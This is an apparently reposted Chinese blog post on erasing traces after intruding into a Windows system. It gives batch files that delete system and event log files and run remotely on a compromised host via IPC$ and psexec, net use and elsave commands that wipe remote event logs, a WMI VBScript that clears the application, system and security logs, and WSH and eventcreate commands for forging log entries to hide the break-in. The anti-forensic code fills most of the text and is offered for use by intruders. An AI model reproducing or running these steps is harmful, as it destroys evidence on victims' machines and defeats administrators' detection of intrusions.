入侵系统之后给自己擦足迹

文章转自 http://hi.baidu.com/lixinbo0216/item/3cd9a4f37f1fe814d6ff8ca0

入侵系统之后给自己擦足迹

入侵系统成功后第一件事便是清除日志，擦去自己的形迹，这时可以用以下两个办法：一是自己编写批处理文件来解决，编写一个能清除日志的批处理非常简单，方法是：新建一个具有如下内容的批处理文件：

  @del c:\winnt\system32\logfiles\*.*

  @del c:\winnt\system32\config\*.evt

  @del c:\winnt\system32\dtclog\*.*

  @del c:\winnt\system32\*.log

  @del c:\winnt\system32\*.txt

  @del c:\winnt\*.txt

  @del c:\winnt\*.log

  @del c:\del.bat

  把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令大家一定清楚吧？它是删除文件命令。

  接下来再新建一个批处理文件，内容如下：

  @copy del.bat \\%1\c$

  @echo 向肉鸡复制本机的del.bat……OK

  @psexec \\%1 c:\del.bat

  @echo 在肉鸡上运行del.bat，清除日志文件……OK

  保存为clean.bat即可，假设已经与肉鸡进行了IPC连接，然后在CMD下输入：clean.bat 肉鸡IP，即可清除肉鸡上的日志文件。

  清除日志的另外一个方法是借助第三方软件，如著名黑客软件流光的开发者黑客小榕的elsave.exe，就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件，大家可以在网上下载到。elsave.exe使用起来很简单，首先利用获得的管理员账号与对方建立IPC会话：net use \\ip pass /user: user，然后在命令行下执行如下命令：elsave -s \\ip -l application -C，这样就删除了安全日志。

------------

1。日至清除

一个入侵系统成功后的黑客第一件事便是清除日志，如果以图形界面远程控制对方机器或是从终端登陆进入，删除日志不是一件困难的事，由于日志虽然也是作为一种服务运行，但不同于http,ftp这样的服务，可以在命令行下先停止，再删除，在m命令行下用net stop eventlog是不能停止的，所以有人认为在命令行下删除日志是很困难的，实际上不是这样，下面介绍几种方法:

   1.借助第三方工具：如小榕的elsave.exe远程清除system,applicaton,security的软件，使用方法很简单，首先利用获得的管理员账号与对方建立ipc会话，net use \\ip pass /user: user

然后命令行下：elsave -s \\ip -l application -C，这样就删除了安全日志。

其实利用这个软件还可以进行备份日志，只要加一个参数 -f filename就可以了，在此不再详述。

   2.利用脚本编程中的VMI，也可以实现删除日志，首先获得object对象，然后利用其clearEventLog() 方法删除日志。源代码：

cleanevent.vbs

strComputer = "."

Set objWMIService = GetObject("winmgmts:" _

    & "{impersonationLevel=impersonate,(Backup)}!\\" & _

        strComputer & "\root\cimv2")

dim mylogs(3)

mylogs(1)="application"

mylogs(2)="system"

mylogs(3)="security"

for Each logs in mylogs

Set colLogFiles = objWMIService.ExecQuery _

    ("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")

For Each objLogfile in colLogFiles 

        objLogFile.ClearEventLog()   

Next

next

在上面的代码中,建立一个数组,为application,security,system如果还有其他日志也可以加入数组。

然后用一个for 循环,删除数组中的每一个元素,即各个日志.

2。创建日志：

删除日志后,任何一个有头脑的管理员面对空空的日志,马上就会反应过来被入侵了，所以一个聪明的黑客的学会如何

伪造日志：

    1。利用脚本编程中的eventlog方法是创造日志变得非常简单；下面看一个代码

createlog.vbs

set ws=wscript.createobject("Wscript.shell")

ws.logevent 0 ,"write log success"    '创建一个成功执行日志

这个代码很容易阅读，首先获得wscript的一个shell对象，然后利用shell对象的logevent方法

logevent的用法：logevent eventtype,"description" [,remote system]

eventtype 为日志类型，可以使用的如下:0 代表成功执行，1 执行出错 ，2 警告 ， 4，信息 ，8 成功审计 16 故障审计

所以上面代码中，把0改为1,2,4,8,16均可，引号下的为日志描述。

这种方法写的日志有一个缺点，只能写到应用程序日志，而且日至来源只能为wsh,即windows scripting host,所以不能起太多的隐蔽作用。

   2，微软为了方便系统管理员和程序员，在xp下有个新的命令行工具，eventcreate.exe,利用它，创建日志更加简单。

eventcreate -s server -l logname  -u username -p password -so source -t eventtype -id id -d description

含义：-s 为远程主机创建日志： -u 远程主机的用户名 -p 远程主机的用户密码

-l 日志；可以创建system和application 不能创建security日志，

-so 日志来源，可以是任何日志 -t 日志类型 如information信息，error错误,warning 警告，

-d 日志描述，可以是任意语句  -id 自主日志为1-1000之内

例如，我们要本地创建一个系统日志，日至来源为admin,日志类型是警告,描述为"this is a test",事件ID为500

可以用如下参数

eventcreate -l system -so administrator -t warning -d "this is a test" -id 500

#网络
举报 浏览(25) 评论 转载